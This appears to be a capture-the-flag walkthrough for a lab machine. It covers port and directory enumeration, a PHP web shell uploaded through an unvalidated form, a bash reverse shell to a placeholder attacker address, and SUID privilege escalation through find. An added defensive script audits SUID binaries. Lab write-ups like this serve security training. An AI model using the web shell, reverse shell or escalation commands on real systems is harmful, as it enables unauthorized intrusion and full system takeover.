🧠 Overview
Target machine with a vulnerable web application leading to privilege escalation.
🌐 Enumeration
Nmap
```bash
nmap -sC -sV -p- 10.10.10.10
```
Web
http://10.10.10.10
Directory Bruteforce
```bash
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
```
🔍 Initial Access
Discovered an upload functionality.
Upload a simple web shell:
```php
<?php system($_GET['cmd']); ?>
```
Execute commands:
```bash
curl "http://10.10.10.10/uploads/shell.php?cmd=id"
```
🐚 Reverse Shell
Start listener:
```bash
nc -lvnp 4444
```
Trigger shell:
```bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
```
Upgrade shell:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
🔐 Privilege Escalation
SUID Check
```bash
find / -perm -4000 2>/dev/null
```
Exploit
```bash
/usr/bin/find . -exec /bin/sh -p \; -quit
```
📁 Flags
```bash
cat /home/user/user.txt
cat /root/root.txt
```
📊 Notes
- Upload functionality lacked validation
- SUID binaries exposed privilege escalation path
- Always check GTFOBins for exploitation vectors
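
A defender-side counterpart to the SUID finding above, as an added example that is not part of the original writeup: it audits a directory tree for SUID files and separates those that can run arbitrary commands from those that are merely unexpected. Both name lists and the sample tree are constructed assumptions; replace them with your distribution's baseline and the entries you confirm on GTFOBins.

```shell
#!/usr/bin/env bash
# Added example: flag SUID files that can run commands or fall outside a baseline.

# Assumption: short, constructed list of tools able to run arbitrary commands.
COMMAND_CAPABLE="find bash env vim python3 perl awk nmap less"
# Assumption: SUID binaries this host is expected to ship (adjust per distro).
BASELINE="passwd su sudo mount umount chsh chfn newgrp gpasswd"

in_list() {  # in_list WORD "space separated list"
  case " $2 " in *" $1 "*) return 0 ;; esac
  return 1
}

# Print "RISK <path>" for SUID files that can run commands and
# "REVIEW <path>" for SUID files outside the baseline; baseline files are silent.
audit_suid() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null | sort | while IFS= read -r f; do
    name=$(basename "$f")
    if in_list "$name" "$COMMAND_CAPABLE"; then
      echo "RISK $f"
    elif ! in_list "$name" "$BASELINE"; then
      echo "REVIEW $f"
    fi
  done
}

# Constructed sample tree so the audit can be exercised without touching the host.
make_sample_tree() {
  d=$(mktemp -d)
  touch "$d/find" "$d/passwd" "$d/backup-helper" "$d/ls"
  chmod 4755 "$d/find" "$d/passwd" "$d/backup-helper"
  chmod 0755 "$d/ls"
  echo "$d"
}

tree=$(make_sample_tree)
audit_suid "$tree"
rm -rf "$tree"
```

On a real host, run `audit_suid /` from a scheduled job and alert on any `RISK` line; the usual fix is `chmod u-s` on the flagged binary.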
📌 Quick Commands
```bash
whoami
id
uname -a
```
🧩 Inline Example
Use `sudo -l` to check privileges.
📋 Summary
| Phase | Technique |
|---|---|
| Recon | Nmap |
| Access | File Upload |
| Shell | Reverse Shell |
| PrivEsc | SUID Exploit |